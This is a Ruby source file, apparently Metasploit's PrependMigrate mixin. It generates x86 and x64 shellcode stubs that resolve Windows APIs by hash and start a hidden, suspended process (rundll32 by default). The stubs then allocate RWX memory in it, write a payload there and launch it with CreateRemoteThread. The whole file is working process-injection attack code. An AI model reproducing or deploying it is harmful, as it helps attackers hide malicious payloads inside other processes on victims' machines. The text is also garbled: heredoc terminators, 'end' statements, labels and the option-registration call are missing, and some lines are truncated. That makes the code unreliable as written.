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# -*- coding: binary -*-

# This mixin provides support for generating PrependMigrate blocks for Windows payloads
module Msf::Payload::Windows::PrependMigrate

  # Initialize
  def initialize(info = {})
    ret = super( info )

        Msf::OptBool.new('PrependMigrate', [ true, "Spawns and runs shellcode in new process", false ]),
        Msf::OptString.new('PrependMigrateProc', [ false, "Process to spawn and run shellcode in" ])
      ], Msf::Payload::Windows )

  # Returns the state of the PrependMigrate option
  # See https://github.com/rapid7/metasploit-framework/pull/917
  # for discussion.
  def prepend_migrate?

  # Overload the generate() call to prefix our stubs
  def apply_prepend_migrate(buf)
    pre = ''

    test_arch = [ *(self.arch) ]

    if prepend_migrate?
      # Handle all x86 code here
      if test_arch.include?(ARCH_X86)
        migrate_asm = prepend_migrate(buf)
        pre << Metasm::Shellcode.assemble(Metasm::Ia32.new, migrate_asm).encode_string
      # Handle all x64 code here
      elsif test_arch.include?(ARCH_X64)
        migrate_asm = prepend_migrate_64(buf)
        pre << Metasm::Shellcode.assemble(Metasm::X64.new, migrate_asm).encode_string
    return pre + buf

  # Create assembly
  def prepend_migrate(buf)
    payloadsize = "0x%04x" % buf.length
    procname = datastore['PrependMigrateProc'] || 'rundll32'

    # Prepare instructions to get address of block_api into ebp
    block_api_start = <<-EOS
      call start
    block_api_asm = <<-EOS
      pushad                    ; We preserve all the registers for the caller, bar EAX and ECX.
      mov ebp, esp              ; Create a new stack frame
      xor eax, eax              ; Zero EAX (upper 3 bytes will remain zero until function is found)
      mov edx, [fs:eax+48]      ; Get a pointer to the PEB
      mov edx, [edx+12]         ; Get PEB->Ldr
      mov edx, [edx+20]         ; Get the first module from the InMemoryOrder module list
    next_mod:                   ;
      mov esi, [edx+40]         ; Get pointer to modules name (unicode string)
      movzx ecx, word [edx+38]  ; Set ECX to the length we want to check
      xor edi, edi              ; Clear EDI which will store the hash of the module name
    loop_modname:               ;
      lodsb                     ; Read in the next byte of the name
      cmp al, 'a'               ; Some versions of Windows use lower case module names
      jl not_lowercase          ;
      sub al, 0x20              ; If so normalise to uppercase
    not_lowercase:              ;
      ror edi, 13               ; Rotate right our hash value
      add edi, eax              ; Add the next byte of the name
      loop loop_modname         ; Loop until we have read enough

      ; We now have the module hash computed
      push edx                  ; Save the current position in the module list for later
      push edi                  ; Save the current module hash for later
      ; Proceed to iterate the export address table
      mov edx, [edx+16]         ; Get this modules base address
      mov ecx, [edx+60]         ; Get PE header

      ; use ecx as our EAT pointer here so we can take advantage of jecxz.
      mov ecx, [ecx+edx+120]    ; Get the EAT from the PE header
      jecxz get_next_mod1       ; If no EAT present, process the next module
      add ecx, edx              ; Add the modules base address
      push ecx                  ; Save the current modules EAT
      mov ebx, [ecx+32]         ; Get the rva of the function names
      add ebx, edx              ; Add the modules base address
      mov ecx, [ecx+24]         ; Get the number of function names
      ; now ecx returns to its regularly scheduled counter duties

      ; Computing the module hash + function hash
    get_next_func:              ;
      jecxz get_next_mod        ; When we reach the start of the EAT (we search backwards), process the next module
      dec ecx                   ; Decrement the function name counter
      mov esi, [ebx+ecx*4]      ; Get rva of next module name
      add esi, edx              ; Add the modules base address
      xor edi, edi              ; Clear EDI which will store the hash of the function name
      ; And compare it to the one we want
    loop_funcname:              ;
      lodsb                     ; Read in the next byte of the ASCII function name
      ror edi, 13               ; Rotate right our hash value
      add edi, eax              ; Add the next byte of the name
      cmp al, ah                ; Compare AL (the next byte from the name) to AH (null)
      jne loop_funcname         ; If we have not reached the null terminator, continue
      add edi, [ebp-8]          ; Add the current module hash to the function hash
      cmp edi, [ebp+36]         ; Compare the hash to the one we are searchnig for
      jnz get_next_func         ; Go compute the next function hash if we have not found it

      ; If found, fix up stack, call the function and then value else compute the next one...
      pop eax                   ; Restore the current modules EAT
      mov ebx, [eax+36]         ; Get the ordinal table rva
      add ebx, edx              ; Add the modules base address
      mov cx, [ebx+2*ecx]       ; Get the desired functions ordinal
      mov ebx, [eax+28]         ; Get the function addresses table rva
      add ebx, edx              ; Add the modules base address
      mov eax, [ebx+4*ecx]      ; Get the desired functions RVA
      add eax, edx              ; Add the modules base address to get the functions actual VA
      ; We now fix up the stack and perform the call to the desired function...
      mov [esp+36], eax         ; Overwrite the old EAX value with the desired api address for the upcoming popad
      pop ebx                   ; Clear off the current modules hash
      pop ebx                   ; Clear off the current position in the module list
      popad                     ; Restore all of the callers registers, bar EAX, ECX and EDX which are clobbered
      pop ecx                   ; Pop off the original return address our caller will have pushed
      pop edx                   ; Pop off the hash value our caller will have pushed
      push ecx                  ; Push back the correct return value
      jmp eax                   ; Jump into the required function
      ; We now automagically return to the correct caller...

    get_next_mod:               ;
      pop edi                   ; Pop off the current (now the previous) modules EAT
    get_next_mod1:              ;
      pop edi                   ; Pop off the current (now the previous) modules hash
      pop edx                   ; Restore our position in the module list
      mov edx, [edx]            ; Get the next module
      jmp.i8 next_mod           ; Process this module

    # Prepare default exit block (sleep for a long long time)
    exitblock = <<-EOS
      push -1
      push 0xE035F044           ; hash( "kernel32.dll", "Sleep" )
      call ebp                  ; Sleep( ... );

    # Check to see if we can find exitfunc in the payload
    exitfunc_index = buf.index("\x68\xA6\x95\xBD\x9D\xFF\xD5\x3C\x06\x7C\x0A" +
    if exitfunc_index
      exitblock_offset = "0x%04x + payload - exitblock" % (exitfunc_index - 5)
      exitblock = "exitblock:\njmp $+#{exitblock_offset}"

    block_api_ebp_asm = <<-EOS
      pop ebp                   ; Pop off the address of 'api_call' for calling later.
    block_close_to_payload = ''

    # Check if we can find block_api in the payload
    block_api = Metasm::Shellcode.assemble(Metasm::Ia32.new, block_api_asm).encode_string
    block_api_index = buf.index(block_api)
    if block_api_index

      # Prepare instructions to calculate address
      ebp_offset = "0x%04x" % (block_api_index + 5)
      block_api_ebp_asm = <<-EOS
        jmp close_to_payload
        pop ebp
        add ebp, #{ebp_offset}
      # Clear now-unneeded instructions
      block_api_asm = ''
      block_api_start = ''
      block_close_to_payload = <<-EOS
        call return_from_close_to_payload

    #put all pieces together
    migrate_asm = <<-EOS
      cld                       ; Clear the direction flag.
      ; get our own startupinfo at esp+0x60
      add esp,-400              ; adjust the stack to avoid corruption
      lea edx,[esp+0x60]
      push edx
      push 0xB16B4AB1           ; hash( "kernel32.dll", "GetStartupInfoA" )
      call ebp                  ; GetStartupInfoA( &si );

      lea eax,[esp+0x60]        ; Put startupinfo pointer back in eax

      jmp getcommand
      pop esi                   ; esi = address of process name (command line)

      ; create the process
      lea edi,[eax+0x60]        ; Offset of empty space for lpProcessInformation
      push edi                  ; lpProcessInformation : write processinfo here
      push eax                  ; lpStartupInfo : current info (read)
      xor ebx,ebx
      push ebx                  ; lpCurrentDirectory
      push ebx                  ; lpEnvironment
      push 0x08000004           ; dwCreationFlags CREATE_NO_WINDOW | CREATE_SUSPENDED
      push ebx                  ; bInHeritHandles
      push ebx                  ; lpThreadAttributes
      push ebx                  ; lpProcessAttributes
      push esi                  ; lpCommandLine
      push ebx                  ; lpApplicationName

      push 0x863FCC79           ; hash( "kernel32.dll", "CreateProcessA" )
      call ebp                  ; CreateProcessA( &si );

      ; if we didn't get a new process, use this one
      test eax,eax
      jz payload                ; If process creation failed, jump to shellcode

      ; allocate memory in the process (VirtualAllocEx())
      ; get handle
      push 0x40                 ; RWX
      add bh, 0x10              ; ebx = 0x1000
      push ebx                  ; MEM_COMMIT

    if buf.length > 4096
      # probably stageless, so we don't have shellcode size constraints,
      # and so we can just set ebx to the size of the payload
      migrate_asm << <<-EOS
      mov ebx, #{payloadsize} ; stageless size

    migrate_asm << <<-EOS
      push ebx                  ; size
      xor ebx,ebx
      push ebx                  ; address
      push [edi]                ; handle
      push 0x3F9287AE           ; hash( "kernel32.dll", "VirtualAllocEx" )
      call ebp                  ; VirtualAllocEx( ...);

      ; eax now contains the destination
      ; WriteProcessMemory()
      push esp                  ; lpNumberOfBytesWritten
      push #{payloadsize}       ; nSize
      ; pick up pointer to shellcode & keep it on stack
      jmp begin_of_payload
      begin_of_payload_return:  ; lpBuffer
      push eax                  ; lpBaseAddress
      push [edi]                ; hProcess
      push 0xE7BDD8C5           ; hash( "kernel32.dll", "WriteProcessMemory" )
      call ebp                  ; WriteProcessMemory( ...)

      ; run the code (CreateRemoteThread())
      push ebx                  ; lpthreadID
      push ebx                  ; run immediately
      push ebx                  ; no parameter
      mov ecx,[esp-0x4]
      push ecx                  ; shellcode
      push ebx                  ; stacksize
      push ebx                  ; lpThreadAttributes
      push [edi]
      push 0x799AACC6           ; hash( "kernel32.dll", "CreateRemoteThread" )
      call ebp                  ; CreateRemoteThread( ...);

      #{exitblock}              ; jmp to exitfunc or long sleep

      call gotcommand
      db "#{procname}"
      db 0x00
      call begin_of_payload_return

  def prepend_migrate_64(buf)
    payloadsize = "0x%04x" % buf.length
    procname = datastore['PrependMigrateProc'] || 'rundll32'

    # Prepare instructions to get address of block_api into ebp
    block_api_start = <<-EOS
      call start
    block_api_asm = <<-EOS
      push r9                  ; Save the 4th parameter
      push r8                  ; Save the 3rd parameter
      push rdx                 ; Save the 2nd parameter
      push rcx                 ; Save the 1st parameter
      push rsi                 ; Save RSI
      xor rdx, rdx             ; Zero rdx
      mov rdx, [gs:rdx+96]     ; Get a pointer to the PEB
      mov rdx, [rdx+24]        ; Get PEB->Ldr
      mov rdx, [rdx+32]        ; Get the first module from the InMemoryOrder module list
    next_mod:                  ;
      mov rsi, [rdx+80]        ; Get pointer to modules name (unicode string)
      movzx rcx, word [rdx+74] ; Set rcx to the length we want to check
      xor r9, r9               ; Clear r9 which will store the hash of the module name
    loop_modname:              ;
      xor rax, rax             ; Clear rax
      lodsb                    ; Read in the next byte of the name
      cmp al, 'a'              ; Some versions of Windows use lower case module names
      jl not_lowercase         ;
      sub al, 0x20             ; If so normalise to uppercase
    not_lowercase:             ;
      ror r9d, 13              ; Rotate right our hash value
      add r9d, eax             ; Add the next byte of the name
      loop loop_modname        ; Loop until we have read enough
      ; We now have the module hash computed
      push rdx                 ; Save the current position in the module list for later
      push r9                  ; Save the current module hash for later
      ; Proceed to iterate the export address table
      mov rdx, [rdx+32]        ; Get this modules base address
      mov eax, dword [rdx+60]  ; Get PE header
      add rax, rdx             ; Add the modules base address
      mov eax, dword [rax+136] ; Get export tables RVA
      test rax, rax            ; Test if no export address table is present
      jz get_next_mod1         ; If no EAT present, process the next module
      add rax, rdx             ; Add the modules base address
      push rax                 ; Save the current modules EAT
      mov ecx, dword [rax+24]  ; Get the number of function names
      mov r8d, dword [rax+32]  ; Get the rva of the function names
      add r8, rdx              ; Add the modules base address
      ; Computing the module hash + function hash
    get_next_func:             ;
      jecxz get_next_mod       ; When we reach the start of the EAT (we search backwards), process the next module
      dec rcx                  ; Decrement the function name counter
      mov esi, dword [r8+rcx*4]; Get rva of next module name
      add rsi, rdx             ; Add the modules base address
      xor r9, r9               ; Clear r9 which will store the hash of the function name
      ; And compare it to the one we want
    loop_funcname:             ;
      xor rax, rax             ; Clear rax
      lodsb                    ; Read in the next byte of the ASCII function name
      ror r9d, 13              ; Rotate right our hash value
      add r9d, eax             ; Add the next byte of the name
      cmp al, ah               ; Compare AL (the next byte from the name) to AH (null)
      jne loop_funcname        ; If we have not reached the null terminator, continue
      add r9, [rsp+8]          ; Add the current module hash to the function hash
      cmp r9d, r10d            ; Compare the hash to the one we are searchnig for
      jnz get_next_func        ; Go compute the next function hash if we have not found it
      ; If found, fix up stack, call the function and then value else compute the next one...
      pop rax                  ; Restore the current modules EAT
      mov r8d, dword [rax+36]  ; Get the ordinal table rva
      add r8, rdx              ; Add the modules base address
      mov cx, [r8+2*rcx]       ; Get the desired functions ordinal
      mov r8d, dword [rax+28]  ; Get the function addresses table rva
      add r8, rdx              ; Add the modules base address
      mov eax, dword [r8+4*rcx]; Get the desired functions RVA
      add rax, rdx             ; Add the modules base address to get the functions actual VA
      ; We now fix up the stack and perform the call to the drsired function...
      pop r8                   ; Clear off the current modules hash
      pop r8                   ; Clear off the current position in the module list
      pop rsi                  ; Restore RSI
      pop rcx                  ; Restore the 1st parameter
      pop rdx                  ; Restore the 2nd parameter
      pop r8                   ; Restore the 3rd parameter
      pop r9                   ; Restore the 4th parameter
      pop r10                  ; pop off the return address
      sub rsp, 32              ; reserve space for the four register params (4 * sizeof(QWORD) = 32)
                               ; It is the callers responsibility to restore RSP if need be (or alloc more space or align RSP).
      push r10                 ; push back the return address
      jmp rax                  ; Jump into the required function
      ; We now automagically return to the correct caller...
    get_next_mod:              ;
      pop rax                  ; Pop off the current (now the previous) modules EAT
    get_next_mod1:             ;
      pop r9                   ; Pop off the current (now the previous) modules hash
      pop rdx                  ; Restore our position in the module list
      mov rdx, [rdx]           ; Get the next module
      jmp next_mod             ; Process this module

    # Prepare default exit block (sleep for a long long time)
    exitblock = <<-EOS
      xor rcx,rcx
      dec rcx                   ; rcx = -1
      mov r10d, 0xE035F044      ; hash( "kernel32.dll", "Sleep" )
      call rbp                  ; Sleep( ... );

    # Check to see if we can find x64 exitfunc in the payload
    exitfunc_index = buf.index("\x41\xBA\xA6\x95\xBD\x9D\xFF\xD5\x48\x83\xC4\x28\x3C\x06" +
    if exitfunc_index
      exitblock_offset = "0x%04x + payload - exitblock" % (exitfunc_index - 5)
      exitblock = "exitblock:\njmp $+#{exitblock_offset}"

    block_api_rbp_asm = <<-EOS
      pop rbp                   ; Pop off the address of 'api_call' for calling later.
    block_close_to_payload = ''

    # Check if we can find block_api in the payload
    block_api = Metasm::Shellcode.assemble(Metasm::X64.new, block_api_asm).encode_string
    block_api_index = buf.index(block_api)
    if block_api_index

      # Prepare instructions to calculate address
      rbp_offset = "0x%04x" % (block_api_index + 5)
      block_api_rbp_asm = <<-EOS
        jmp close_to_payload
        pop rbp
        add rbp, #{rbp_offset}
      # Clear now-unneeded instructions
      block_api_asm = ''
      block_api_start = ''
      block_close_to_payload = <<-EOS
        call return_from_close_to_payload

    #put all pieces together
    migrate_asm = <<-EOS
      cld                       ; Clear the direction flag.
      ; get our own startupinfo at esp+0x60
      add rsp,-400              ; adjust the stack to avoid corruption
      lea rcx,[rsp+0x30]
      mov r10d, 0xB16B4AB1      ; hash( "kernel32.dll", "GetStartupInfoA" )
      call rbp                  ; GetStartupInfoA( &si );

      jmp getcommand
      pop rsi                   ; rsi = address of process name (command line)

      ; create the process
      push 0                    ; keep the stack aligned
      lea rdi,[rsp+0x120]       ; Offset of empty space for lpProcessInformation
      push rdi                  ; lpProcessInformation : write processinfo here
      lea rcx,[rsp+0x60]
      push rcx                  ; lpStartupInfo : current info (read)
      xor rcx,rcx
      push rcx                  ; lpCurrentDirectory
      push rcx                  ; lpEnvironment
      push 0x08000004           ; dwCreationFlags CREATE_NO_WINDOW | CREATE_SUSPENDED
      push rcx                  ; bInHeritHandles
      mov r9, rcx               ; lpThreadAttributes
      mov r8, rcx               ; lpProcessAttributes
      mov rdx, rsi              ; lpCommandLine
      ; rcx is already zero     ; lpApplicationName
      mov r10d, 0x863FCC79      ; hash( "kernel32.dll", "CreateProcessA" )
      call rbp                  ; CreateProcessA( &si );

      ; if we didn't get a new process, use this one
      test rax,rax
      jz payload                ; If process creation failed, jump to shellcode

      ; allocate memory in the process (VirtualAllocEx())
      ; get handle
      push 0x40                 ; RWX
      mov r9,0x1000             ; 0x1000 = MEM_COMMIT

    if buf.length > 4096
      # probably stageless, so we don't have shellcode size constraints,
      # and so we can just set r8 to the size of the payload
      migrate_asm << <<-EOS
      mov r8, #{payloadsize} ; stageless size
      # otherwise we'll just reuse r9 (4096) for size
      migrate_asm << <<-EOS
      mov r8,r9                 ; size

    migrate_asm << <<-EOS
      xor rdx,rdx               ; address
      mov rcx, [rdi]            ; handle
      mov r10d, 0x3F9287AE      ; hash( "kernel32.dll", "VirtualAllocEx" )
      call rbp                  ; VirtualAllocEx( ...);

      ; eax now contains the destination - save in ebx
      mov rbx, rax              ; lpBaseAddress
      ; WriteProcessMemory()
      push rsp                  ; lpNumberOfBytesWritten
      mov r9, #{payloadsize}    ; nSize
      ; pick up pointer to shellcode & keep it on stack
      jmp begin_of_payload
      pop r8                    ; lpBuffer
      mov rdx, rax              ; lpBaseAddress
      mov rcx, [rdi]            ; hProcess
      mov r10d, 0xE7BDD8C5      ; hash( "kernel32.dll", "WriteProcessMemory" )
      call rbp                  ; WriteProcessMemory( ...);

      ; run the code (CreateRemoteThread())
      xor rcx, rcx              ; rdx = 0
      push rcx                  ; lpthreadID
      push rcx                  ; run immediately
      push rcx                  ; no parameter
      mov r9,rbx                ; shellcode
      mov r8, rcx               ; stacksize
      ;rdx already equals 0     ; lpThreadAttributes
      mov rcx, [rdi]
      mov r10d, 0x799AACC6      ; hash( "kernel32.dll", "CreateRemoteThread" )
      call rbp                  ; CreateRemoteThread( ...);

      #{exitblock}              ; jmp to exitfunc or long sleep

      call gotcommand
      db "#{procname}"
      db 0x00
      call begin_of_payload_return
